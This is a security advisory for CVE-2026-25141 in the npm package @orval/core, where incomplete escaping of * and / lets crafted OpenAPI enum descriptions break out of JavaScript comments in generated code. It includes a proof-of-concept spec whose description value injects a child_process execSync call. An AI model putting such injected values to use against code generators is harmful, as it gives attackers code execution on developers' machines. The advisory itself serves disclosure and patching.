GHSA-gch2-phqh-fg9q (CVE-2026-25141)

Details

CVE-2026-23947 had an incomplete fix

While the current jsStringEscape function properly handles single quotes ('), double quotes (") and other characters, it fails to sanitize * and / characters. This allows attackers to break out of JavaScript comment blocks using */ sequences and inject arbitrary code into generated files.

Example:

openapi: 3.0.4
info:
  title: Enum PoC
  version: "1.0.0"

paths:
  /ping:
    get:
      operationId: ping
      responses:
        "200":
          description: ok
          content:
            application/json:
              schema:
                $ref: "#/components/schemas/EvilEnum"

components:
  schemas:
    EvilEnum:
      type: string
      enum:
        - PWNED
      x-enumDescriptions:
        # "pwned */ }; import('child_process').then(cp => cp.execSync('touch pwned')); const a = { /*"
        - "pwned */ };...

Affected Packages

@orval/core

npm

Fixed in:

7.21.0

@orval/core

npm

Fixed in:

8.2.0

References

ADVISORYhttps://github.com/advisories/GHSA-gch2-phqh-fg9q PACKAGEhttps://github.com/orval-labs/orval WEBhttps://github.com/orval-labs/orval/blob/02211fc413524be340ba9ace866a2ef68845ca7c/packages/core/src/utils/string.ts#L227 WEBhttps://github.com/orval-labs/orval/releases/tag/v7.21.0 WEBhttps://github.com/orval-labs/orval/releases/tag/v8.2.0 WEBhttps://github.com/orval-labs/orval/security/advisories/GHSA-gch2-phqh-fg9q WEBhttps://github.com/orval-labs/orval/security/advisories/GHSA-h526-wf6g-67jv ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2026-25141

GHSA-gch2-phqh-fg9q

Details

Affected Packages

References

Aliases

CVSS Analysis

Related

Ecosystems

Timeline